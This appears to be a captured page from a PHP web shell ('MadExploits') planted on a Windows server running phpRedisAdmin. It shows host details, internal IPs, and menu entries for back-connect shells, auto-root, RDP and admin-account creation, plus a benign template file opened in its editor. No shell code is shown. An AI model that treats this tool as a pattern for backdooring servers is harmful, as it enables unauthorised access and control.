Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
etc /
apps /
phpRedisAdmin /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
common.inc.php
3.07
KB
-rw-rw-rw-
config.environment.inc.php
1.12
KB
-rw-rw-rw-
config.sample.inc.php
3.28
KB
-rw-rw-rw-
footer.inc.php
16
B
-rw-rw-rw-
functions.inc.php
2.83
KB
-rw-rw-rw-
header.inc.php
1.04
KB
-rw-rw-rw-
login.inc.php
4.89
KB
-rw-rw-rw-
page.inc.php
310
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.inc.php
<?php $version = '1-1-1'; header('Content-Type: text/html; charset=utf-8'); header('Cache-Control: private'); ?><!DOCTYPE html> <html lang=en> <head> <meta charset=utf-8> <?php if (is_ie()) { // Always force latest IE rendering engine and chrome frame (also hides compatibility mode button) ?><meta http-equiv=X-UA-Compatible content="IE=edge,chrome=1"><?php } ?> <?php /* Disable phone number detection on apple devices. */?> <meta name=format-detection content="telephone=no"> <?php /* I don't think we ever want this to be indexed*/ ?> <meta name=robots content="noindex,nofollow,noarchive"> <meta name=author content="https://github.com/ErikDubbelboer/"> <title><?php echo format_html($server['host'])?> - phpRedisAdmin</title> <?php foreach ($page['css'] as $css) { ?> <link rel=stylesheet href="css/<?php echo $css; ?>.css?v<?=$version?>" media=all> <?php } ?> <link rel="shortcut icon" href="images/favicon.png"> <?php foreach ($page['js'] as $js) { ?> <script src="js/<?php echo $js; ?>.js?v<?=$version?>"></script> <?php } ?> </head> <body>
Close